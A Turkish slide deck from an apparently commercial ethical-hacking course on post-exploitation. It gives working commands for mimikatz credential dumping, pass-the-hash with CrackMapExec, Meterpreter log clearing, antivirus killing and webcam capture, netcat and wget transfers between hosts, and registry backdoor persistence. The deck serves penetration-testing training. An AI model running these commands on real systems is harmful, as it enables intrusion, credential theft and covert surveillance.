SlideShare a Scribd company logo
1 of 72
www.prismacsi.com
© All Rights Reserved.
1
Uygulamalı Beyaz
Şapkalı Hacker Eğitimi
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye
https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
www.prismacsi.com
© All Rights Reserved.
2
Post Exploitation
www.prismacsi.com
© All Rights Reserved.
3
Konular
• Domain Exploitation
• Meterpreter
• Crackmapexec
• Empire
• Local Privilege Escalation
• Persistence
• Pivoting
www.prismacsi.com
© All Rights Reserved.
4
Domain Exploitation
• Active Directory Nedir?
www.prismacsi.com
© All Rights Reserved.
5
Domain Exploitation
• Tüm sistemlere sızabilmek için:
• Zafiyetler kullanılarak hedef sistemlere sızılır ve kullanıcı yada oturum bilgileri
toplanır.
• Bruteforce ataklar sayesinde sistemlere sızılır.
• Sistemler üzerindeki detaylı bilgi içeren dosyalar ile ek sistemlere sızma girişimleri
denenir.
• Sonuç olarak bir noktada Domain Admin’e giden yol açılır.
• Kontrol artık sende!
www.prismacsi.com
© All Rights Reserved.
6
Domain Exploitation
• Bir Windows sisteme sızıldığında genellikle;
• SAM ve SYSTEM dosyaları ele geçirilir.
• %WINDIR%system32configSAM
• %WINDIR%system32configSYSTEM
• Samdump2 ile hashler elde edilir.
• Veya metasploit oturumu üzerinden hashdump çalıştırılır.
• Elde edilen hashler kırılır ya da pass-the-hash yöntemi ile tüm networkte denenir.
www.prismacsi.com
© All Rights Reserved.
7
Mimikatz - Uygulama
• Mimikatz ile hafızadan açık metin parolalar elde edilebilir.
• https://github.com/gentilkiwi/mimikatz
• mimikatz # privilege::debug
• mimikatz # sekurlsa::logonpasswords
www.prismacsi.com
© All Rights Reserved.
8
Tarayıcı Parolaları
• Metasploit üzerinde birçok tarayıcı modülü bulunmakta.
• run post/windows/gather/enum_chrome
• run post/multi/gather/firefox_creds
• git clone https://github.com/Unode/firefox_decrypt.git
• Nirsoft yazılımları kullanılabilir
• https://www.nirsoft.net/utils/web_browser_password.html
www.prismacsi.com
© All Rights Reserved.
9
MS14-068 Zafiyeti
• Domain Admin yetkisine erişimi sağlayan kritik seviye bir zafiyettir.
• Kerberos zafiyeti
• PyKEK scripti ile kolayca exploit edilebilir. (https://github.com/mubix/pykek )
www.prismacsi.com
© All Rights Reserved.
10
Meterpreter
• Metasploit içerisinde yer alan gelişmiş
bir payloaddır ve manuel olarak
gerçekleştirilebilecek bir çok işlemi post
exploitleri sayesinde hızlıca
çözümleyebilir.
• Superman olarak düşünülebilir.
• Post exploitation adımının
vazgeçilmezidir.
www.prismacsi.com
© All Rights Reserved.
11
Post Exploitation
• Exploit sonrası işlemler
• Hedef sisteme özel araştırma teknikleri
• Parola özetlerini elde etme adımları
• Konfigürasyon dosyalarını tespit etme
• Domain kullanıcılarını tespit etme ve aksiyon
• Bellekten parolaların elde edilmesi
• Envanter çıkarımı
www.prismacsi.com
© All Rights Reserved.
12
Post Exploitation - Uygulama
• Meterpreter Temel Komutları
• sysinfo – Sistem hakkında bilgi almak için kullanılır
• background – Sessionı arka plana atmak için kullanılır
• getuid – uid bilgisini almak için kullanılır
• upload – sisteme dosya yüklemek için kullanılır
• download – sistemden dosya çekmek için kullanılır
www.prismacsi.com
© All Rights Reserved.
13
Post Exploitation - Uygulama
• Meterpreter Temel Komutları
• screenshot – Ekran görüntüsü almak için kullanılır
• ps – çalışan processleri listelemek için kullanılır
• migrate – çalışan bir process’e bağlanarak kalıcılık sağlamak için kullanılır
• getsystem – sistemde yetki yükseltmek için kullanılır
www.prismacsi.com
© All Rights Reserved.
14
Post Exploitation - Uygulama
• Meterpreter Temel Komutları
• Hashdump – kullanıcı bilgilerinin hashini almak için kullanılır
• run hashdump – hashdump post exploiti çalıştırılır
• record_mic – ses kaydı almak için kullanılır
• webcam_snip 1 – sistem üzerinde bir webcam var ise aktifleştirilir ve görüntü alınır.
www.prismacsi.com
© All Rights Reserved.
15
Post Exploitation - Uygulama
• Meterpreter ile hedef sistemin ağ trafiğini dinleme
• use sniffer diyerek sniffer ı aktifleştirebilirsiniz.
• sniffer_interfaces - interfaceleri görüntüleme.
• sniffer_start 3- 3 nolu interface için paket kaydı yapma.
• sniffer_dump 3 /tmp/dump.pcap – 3 nolu interface için alınan trafik kaydını kayıt etme
www.prismacsi.com
© All Rights Reserved.
16
Post Exploitation - Uygulama
• Meterpreter Diğer Komutlar
• enum_firefox – Firefox browserı eğer sistemde yüklüyse veri çekmek için kullanılır
• clearev – logları silmek için kullanılır
• killav – antivirüsleri kapatmak için kullanılır
• run get_application_list – sistemde yüklü uygulamaları listeler
• run hostedit -e 10.0.1.5,facebook.com – Hocam facebook hesaplarını nasıl hacklerim? J
• enable_rdp – RDP servisini aktifleştirmek için kullanılır.
www.prismacsi.com
© All Rights Reserved.
17
Post Exploitation - Uygulama
• Meterpreter Post Exploit Kullanımı
• run post/<TAB>
• use post/windows/gather/enum_domain – Domain enumeration için kullanılır.
• run post/windows/gather/enum_applications – Sistemde yüklü uygulamaları keşfet
• run post/windows/gather/credentials/winscp – Sistemde yüklü winscp uygulamasından
parolaları çıkar
www.prismacsi.com
© All Rights Reserved.
18
Post Exploitation - Uygulama
• Yetki yükseltme için kullanılabilecek komutlar
• getsystem – Sistemde NT AUTHORITYSystem yetkilerine erişim için bir yol varsa, bu
yolu kullanarak sizi en yetkili kullanıcı yapar.
• bypass_uac – UAC ‘ı aşmak için kullanılır.
www.prismacsi.com
© All Rights Reserved.
19
Post Exploitation - Uygulama
• Meterpreter özel modüller
• incognito – candır <3
• use incognito – incognito modülünü aktifleştirir
• list_tokens – sistemde var olan tokenları listeler
• impersonate_token – tokenları üstünüze almanıza olanak sağlar
• Domain Admin tokenı yakaladığınızda incognito ile bu yetkiye sıçrayabilirsiniz.
www.prismacsi.com
© All Rights Reserved.
20
Post Exploitation
• Empire, PowerShell ve Python kullanan bir post-
exploitation aracıdır.
• Esnek ve kriptolu güvenlik yapısıyla hedef sistemlerde
post-exploitation aşamasında kullanılacak modüller
barındırır.
• Eğer sistemde antivirus gibi bir önlem kullanılıyorsa
PowerShell kullandığı için bunların güvenlik
engellerine de takılmadan hareket eder.
www.prismacsi.com
© All Rights Reserved.
21
Post Exploitation
• Empire üç farklı özellik barındırır.
• Biz de bunları ve içerisinde bulunan modülleri
kullanarak post-exploitation işlemini gerçekleştiririz.
• Bunlar:
• Listeners
• Stagers
• Agents
www.prismacsi.com
© All Rights Reserved.
22
Post Exploitation
• İlk yapacağımız şey Metasploit’te olduğu gibi Empire
üzerinden shell alabilmek için bir listener başlatmak
olmalı.
• listeners komutu ile listeners menüsüne giriyoruz ve
aynı zamanda aktif olan tüm listenerlar liste olarak
sunuluyor.
• Listener’ımızı seçip ayarlarını yaptıktan sonra
execute komutu ile listenerımızı aktif hale
getiriyoruz.
www.prismacsi.com
© All Rights Reserved.
23
Empire - Uygulama
www.prismacsi.com
© All Rights Reserved.
24
Post Exploitation
• Empire aracı, listener açıldıktan sonra ona bağlantıyı
gönderecek ve listener’ın hedef sisteme
bağlanmasını sağlayacak çeşitli stagerlar bulundurur.
• usestager <tab> komutu ile uygun stagerlar listelenir
ve işimize yarayan seçilerek konfigüre edildikten
sonra execute komutu ile çalıştırılır.
www.prismacsi.com
© All Rights Reserved.
25
Empire - Uygulama
www.prismacsi.com
© All Rights Reserved.
26
Empire - Uygulama
www.prismacsi.com
© All Rights Reserved.
27
Post Exploitation
• Listener başlatılıp stager hedef sistemde
çalıştırıldıktan sonra, agents modülünden hedef
sistemde açılan bağlantı uyarısı alınır.
• agents komutu ile menüye gidilir.
• Açılan bağlantıyı aktif hale getirmek için interact
<bağlantı-ismi> komutu kullanılır.
www.prismacsi.com
© All Rights Reserved.
28
Empire - Uygulama
www.prismacsi.com
© All Rights Reserved.
29
Post Exploitation - CME
• Crackmapexec (CME)
• İsviçre çakısı gibi bir araç
• İçerisinde network tabanlı ataklarınızı hızlandıracak birçok
özellik mevcut.
• Tek komutla tüm networkte pass the hash saldırısı yapıp
içeride var olan tokenları, mimikatz ile memory dumpları vs alabilirsiniz.
www.prismacsi.com
© All Rights Reserved.
30
Post Exploitation – CME – Uygulama
• Bir kullanıcı adı ve parola ile tüm networkü tarayabilirsiniz.
• crackmapexec smb 10.0.1.0/24 -u Administrator-p Password123!
• Pass the Hash saldırısı yapabilirsiniz.
• crackmapexec smb 10.0.1.0/24 -u Administrator -H
E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949
• Sızabildiğiniz tüm sistemlerde mimikatz çalıştırabilirsiniz.
• crackmapexec smb 192.168.1.1/24 -u Administrator -p Password123! -M mimikatz
www.prismacsi.com
© All Rights Reserved.
31
Post Exploitation – Dosya Transferi
• Bir sisteme sızıldığında dosya transferi yapmak için elinizin altında meterpreter gibi
yetenekli bir ajan olmayabilir. Sahip olduğunuz shell içerisinde dosya transferi için
aşağıdaki komutlardan faydalanabiliriz.
• Python 2 ile:
• Servis ayaklandırma : python -m SimpleHTTPServer 8000
• Client ile çekme : wget http://10.0.1.5:8000/dosya
• Python 3 ile:
• Servis ayaklandırma : python –m http.server 8000
• Client ile çekme : wget http://10.0.1.5:8000/dosya
www.prismacsi.com
© All Rights Reserved.
32
Post Exploitation – Dosya Transferi
• Apache servisini kendi makinenizde ayaklandırarak da dosya transferi yapabilirsiniz.
• Fakat dikkat! Eğer çalıştırdığı bir dil varsa (örn: php) raw içerik alamazsınız.
• Servisi başlat : service apache2 start
• Client ile çek : wget http://10.0.1.5
• PHP ile de yapılabilir.
• Servisi başlat : php -S 0.0.0.0:8000
• Client ile çek : wget http://10.0.1.5:8000
www.prismacsi.com
© All Rights Reserved.
33
Post Exploitation – Dosya Transferi
• Hacklediğiniz sistem Windows ise?
• bitsadmin kullanabilirsiniz.
• bitsadmin /transfer n http://domain/file c:%homepath%file
• nc ile de yine dosya transferi yapılabilir. Hedef sisteme eğer içerisinde nc binarysi yoksa
yüklenir ve öyle çalıştırılır.
• nc –l 1337 > dosya
• nc 10.0.1.6 1337 < dosya
• nc’nin sürüme göre farklı kullanım yöntemleri bulunmaktadır. Örneğin port belirtinken
bazı sürümler –p parametresini de isteyebilir. nc –l –p 1337 gibi.
www.prismacsi.com
© All Rights Reserved.
34
Yetki Yükseltme Saldırıları
• Sistemde birden fazla yetki grubu mevcut.
• Linux ve MacOS için root, Windows için Administrator kullanıcısı en yetkili kullanıcıdır.
• Yetki yükseltme saldırıları ile birlikte herhangi bir kullanıcının, yetki kullanıcı yetkilerine erişmesi
mümkündür.
• Local Exploitler!
www.prismacsi.com
© All Rights Reserved.
35
Yetki Yükseltme Saldırıları
• Neden ihtiyaç duyarız?
• Sistemdeki hassas dosyaları okuma ve üzerine yazabilme imkanı
• Sistemde kalıcılık sağlayabilme
• Sistemi tüm yetkilerle ele geçirme
• Sistemi ileri seviye izleme
www.prismacsi.com
© All Rights Reserved.
36
Yetki Yükseltme Saldırıları
• Linux Yetki Yükseltme Saldırı Tipleri
• Kernel exploitleri
• Root yetkisi ile çalışan servislerin exploit edilmesi
• Suid-bit yetkisi olan Programların exploit edilmesi
• sudo hakları olan kullanıcıların exploit edilmesi
• Konfigurasyon hatası olan cron-job uygulamalarının exploit edilmesi
www.prismacsi.com
© All Rights Reserved.
37
Yetki Yükseltme Saldırıları
• Kernel Exploitleri
• Kernel exploitleri, Linux kernel’inde (çekirdeğinde) bulunan zafiyetleri kullanarak yükseltilmiş
yetkilerle komut çalıştırılmasına izin veren programlardır.
• Başarılı bir kernel exploiti genellikle kullanıcıya super user yetkileri (#root) ile komut
çalıştırmasını sağlar.
• Kernel exploitinin hedef sistemde çalışması için zafiyeti içeren kernel sürümünü kullanan bir
makine ve bu exploiti hedef sisteme atabileceğimiz bir bağlantımız olması gerekmekte, en son
aşama olarak hedef sisteme atılan exploiti çalıştırabiliyor olmamız gerekmektedir.
www.prismacsi.com
© All Rights Reserved.
38
Yetki Yükseltme Saldırıları
• UYARI!
• Kernel exploitleri her zaman en son çare olarak kullanılmalıdır. Çünkü internette
bulunan exploitlerin tamamının stable olmamasından dolayı exploit çalıştırılan sistem
crash olabilir ve çalıştırılan exploit hedef sistemde yakalanmaya sebebiyet verecek iz
ve loglar bırakabilir.
www.prismacsi.com
© All Rights Reserved.
39
Yetki Yükseltme Saldırıları
www.prismacsi.com
© All Rights Reserved.
40
Yetki Yükseltme Saldırıları
• Root yetkisi ile çalışan servislerin exploit edilmesi
• Root yetkisi ile çalışan herhangi bir servisi exploit etmek her zaman root shelli ile sonuçlanır. Bu
yüzden sisteminizde çalışan servisleri her zaman kontrol etmeli, root yetkisi ile çalışıp
çalışmadığına bakmalı ve gerekmiyorsa root yetkisi ile çalıştırmamalısınız.
www.prismacsi.com
© All Rights Reserved.
41
Yetki Yükseltme Saldırıları
www.prismacsi.com
© All Rights Reserved.
42
Yetki Yükseltme Saldırıları
• SUID Bit Exploit
• SUID (Set User ID), bir programın belirtilen user yetkileri ile çalıştırılmasına yarayan bir Linux
özelliğidir. Örnek olarak ping komutu network socketleri açabilmesi için her zaman root
yetkileri ile çalışmalıdır. Bu yüzden kurulu olduğu herhangi bir sistemde otomatik olarak root
kullanıcısının yetkileri ile suid izni vardır. Böylece her kullanıcı ping komutunu kullanabilir.
www.prismacsi.com
© All Rights Reserved.
43
Yetki Yükseltme Saldırıları
www.prismacsi.com
© All Rights Reserved.
44
Yetki Yükseltme Saldırıları
www.prismacsi.com
© All Rights Reserved.
45
Yetki Yükseltme Saldırıları
• Sudo Hakkı Exploit Edilmesi
• Herhangi bir sudo kullanıcısına erişildiyse bundan sonra kullanıcının sudo hakları kullanılarak
herhangi bir komut root yetkisi ile çalıştırılabilir.
www.prismacsi.com
© All Rights Reserved.
46
Yetki Yükseltme Saldırıları
www.prismacsi.com
© All Rights Reserved.
47
Yetki Yükseltme Saldırıları
• Cronjob Exploit
• Cron-job olarak çalışan bir script veya binary yazılabilir ise bu script veya binary üzerinde
düzenleme yaparak root shelli elde edebiliriz.
www.prismacsi.com
© All Rights Reserved.
48
Yetki Yükseltme Saldırıları
www.prismacsi.com
© All Rights Reserved.
49
Yetki Yükseltme Saldırıları
• Tavsiyeler
• Hedef sistemde ilk önce LinEnum gibi sistemde tarama yaparak bize bilgi verecek scriptler
kullanmak kolaylık sağlayabilir.
• Bazı kullanıcıların credentialları bilgisayarda herhangi bir klasörde .txt dosyası halinde tuttukları
daha önceden görüldüğü için, hedef sistemi kapsamlı bir şekilde aramak iyi bir adımdır.
• Credentialların bulunması halinde yetki yükseltmek için uğraşmaya gerek kalmayabilir.
www.prismacsi.com
© All Rights Reserved.
50
Yetki Yükseltme Saldırıları
• Windows Yetki Yükseltme Saldırı Tipleri
• Windows Kernel Exploit
• Meterpreter ile Migrate
• Depolanmış Credentiallar
• Domain Exploitation
www.prismacsi.com
© All Rights Reserved.
51
Yetki Yükseltme Saldırıları
www.prismacsi.com
© All Rights Reserved.
52
Yetki Yükseltme Saldırıları
• Hedef sistemde otomatik olarak tarama yaparak patchlenmemiş zafiyetleri gösterir.
www.prismacsi.com
© All Rights Reserved.
53
Yetki Yükseltme Saldırıları
• Hedef sistemde otomatik olarak tarama yaparak bulunan zafiyetleri gösterir.
www.prismacsi.com
© All Rights Reserved.
54
Yetki Yükseltme Saldırıları
• Bu modül ile hedef sistemde bulunan kullanıcıların parolalarının hashlerini ele geçirebiliriz.
www.prismacsi.com
© All Rights Reserved.
55
Yetki Yükseltme Saldırıları
• Bu modül ile hedef sistemde Administrator kullanıcı yetkileri ile çalışan herhangi bir process’e geçiş
yaparak yetki yükseltebiliriz.
www.prismacsi.com
© All Rights Reserved.
56
Yetki Yükseltme Saldırıları
• Privesc_Check Scripti
• https://github.com/pentestmonkey/windows-privesc-check
www.prismacsi.com
© All Rights Reserved.
57
Persistence / Kalıcılık
• Persistence, hedef sistemde shell aldıktan sonra sistemdeki varlığımızı kalıcı hale getiren yöntemlere
denir. Bu herhangi bir script olabilir, çalışan bir process’e gömülmüş bir backdoor olabilir. Gerisi
hacker’ın hayal gücüne kalmıştır.
www.prismacsi.com
© All Rights Reserved.
58
Persistence / Kalıcılık
• Teknikler - Backdoor
• Backdoorlar akla gelen ilk ve en kolay yöntemlerdir.
• İnternet aleminde çok fazla alternatifi bulunabilir.
• Olumsuz yanı çok kolay tespit edilebilmesidir.
www.prismacsi.com
© All Rights Reserved.
59
Persistence / Kalıcılık
• Teknikler - Direct Code Injection
• Çalışan uygulamalara zarar vermeden zararlı kodu ekleme işlemidir.
• Yeni bir uygulama çalıştırılmadığı, sadece çalışan bir uygulamaya enjekte edildiği için tespit
edilmesi neredeyse imkansızdır.
• Olumsuz yanı sistem reboot edildiğinde kaybolur.
www.prismacsi.com
© All Rights Reserved.
60
Persistence / Kalıcılık
• Metasploit – Persistence Modülü
• Hedef sistemde meterpreter shell aldıktan sonra run persistence komutu gerekli ayarları
eklenerek çalıştırılır. Böylece metasploit otomatik olarak sisteme bir backdoor yerleştirir. Daha
sonra belirtilen IP adresi ver porttan istenildiği zaman shell alınabilir.
www.prismacsi.com
© All Rights Reserved.
61
Persistence / Kalıcılık
www.prismacsi.com
© All Rights Reserved.
62
Persistence / Kalıcılık
• s4u_persistence modülü
• Zamanlanmış bir görev
oluşturur ve bu zamanlanmış
görev sayesinde her zaman
shell alınabilir.
www.prismacsi.com
© All Rights Reserved.
63
Persistence / Kalıcılık
• registry_persistence modülü
• Bu modül boot sırasında çalıştırılan bir payload oluşturur ve sisteme gömer. Böylece sistem her
reboot edildiğinde payload çalışır ve shell alınabilir.
www.prismacsi.com
© All Rights Reserved.
64
Persistence / Kalıcılık
• Netcat Kullanımı
• Netcat, TCP/IP protokolünü kullanarak dosya okuma ve yazmaya yarayan network aracıdır.
Hedef sistemde kalıcılık sağlamak için kullanılabilir.
• İlk önce nc.exe dosyası hedef sisteme upload edilir.
www.prismacsi.com
© All Rights Reserved.
65
Persistence / Kalıcılık
• Netcat Kullanımı
• Daha sonra registry değeri nc.exe’yi çalıştıracak şekilde ayarlanır.
• Hedef systemin nc.exe dosyasını çalıştırması için firewall kuralları eklenir ve firewall
devre dışı bırakılır.
www.prismacsi.com
© All Rights Reserved.
66
Persistence / Kalıcılık
• Netcat Kullanımı
www.prismacsi.com
© All Rights Reserved.
67
Persistence / Kalıcılık
• Netcat Kullanımı
• Artık sistemdeki backdoor’umuz hazır. Netcat kullanarak istediğimiz zaman hedef
sistemde shell alabiliriz.
• nc –lvp 10.0.0.55 1337
www.prismacsi.com
© All Rights Reserved.
68
Pivoting
• Kurumsal bir yapı hayal edin.
• Dışa açık bir sunucusu mevcut ve içeride de bu
sunucu diğer sistemler ile bağlantılı.
• Dışarıdan bu sunucuya sızdınız ve istiyorsunuz ki iç
networke de erişim sağlayabilin.
• İşte tam olarak bu noktaya Pivoting! deniyor.
www.prismacsi.com
© All Rights Reserved.
69
Pivoting
• Pivoting işlemini gerçekleştirmek için tünelleme teknikleri kullanabilirsiniz.
• Hedef kurumun bir proxy sunucusu varsa pivoting için kaynak elinizde demektir.
• SSH tünelleme teknikleri kullanılabilir
• Shuttle en güzel araç
• A poor man’s vpn over SSH J
• sudo apt-get install sshuttle
• sshuttle -r root@ipaddress 0.0.0.0/0 -vv
www.prismacsi.com
© All Rights Reserved.
70
Metasploit ile Pivoting
• Metasploit içerisindeki ajan meterpreter ile de pivoting yapabilirsiniz.
• Öncelikle bir routing eklemeniz gerekmektedir.
• run autoroute -s network/subnet
• run autoroute –p : eklediğiniz kurallara bakabilirsiniz.
• Port yönlendirme de yapmak isteyebilirsiniz.
• portfwd add -l 88 -p 80-r ipaddress
• Firefox -> ipaddress:88
www.prismacsi.com
© All Rights Reserved.
71
UYGULAMALAR
www.prismacsi.com
© All Rights Reserved.
72
SORULAR?

More Related Content

What's hot

Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuMehmet Caner Köroğlu
 
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)PRISMA CSI
 
Snort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiSnort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiBGA Cyber Security
 
Siber Güvenlik ve Etik Hacking Sunu - 13
Siber Güvenlik ve Etik Hacking Sunu - 13Siber Güvenlik ve Etik Hacking Sunu - 13
Siber Güvenlik ve Etik Hacking Sunu - 13Murat KARA
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9BGA Cyber Security
 
Siber Güvenlik ve Etik Hacking Sunu - 10
Siber Güvenlik ve Etik Hacking Sunu - 10Siber Güvenlik ve Etik Hacking Sunu - 10
Siber Güvenlik ve Etik Hacking Sunu - 10Murat KARA
 
Zararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab KitabıZararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab KitabıBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15BGA Cyber Security
 
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziKurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziBGA Cyber Security
 
Yazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriYazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriBGA Cyber Security
 
Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Murat KARA
 
Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Murat KARA
 
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakSSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18BGA Cyber Security
 

What's hot (20)

Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
 
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
 
Snort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiSnort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) Eğitimi
 
Kesif ve Zafiyet Tarama
Kesif ve Zafiyet TaramaKesif ve Zafiyet Tarama
Kesif ve Zafiyet Tarama
 
Siber Güvenlik ve Etik Hacking Sunu - 13
Siber Güvenlik ve Etik Hacking Sunu - 13Siber Güvenlik ve Etik Hacking Sunu - 13
Siber Güvenlik ve Etik Hacking Sunu - 13
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
 
Hacking'in Mavi Tarafı -1
Hacking'in Mavi Tarafı  -1Hacking'in Mavi Tarafı  -1
Hacking'in Mavi Tarafı -1
 
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirmeWeb uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
 
Siber Güvenlik ve Etik Hacking Sunu - 10
Siber Güvenlik ve Etik Hacking Sunu - 10Siber Güvenlik ve Etik Hacking Sunu - 10
Siber Güvenlik ve Etik Hacking Sunu - 10
 
Zararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab KitabıZararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab Kitabı
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
 
Metasploit El Kitabı
Metasploit El KitabıMetasploit El Kitabı
Metasploit El Kitabı
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
 
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziKurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
 
Yazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriYazılım Güvenliği Temelleri
Yazılım Güvenliği Temelleri
 
Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5
 
Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9
 
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakSSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
 

Similar to Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması

Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıPRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet KeşfiBeyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet KeşfiPRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma SaldırılarıBeyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma SaldırılarıPRISMA CSI
 
Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploitmsoner
 
W3af ile Web Uygulama Güvenlik Testleri – II
W3af ile Web Uygulama Güvenlik Testleri – IIW3af ile Web Uygulama Güvenlik Testleri – II
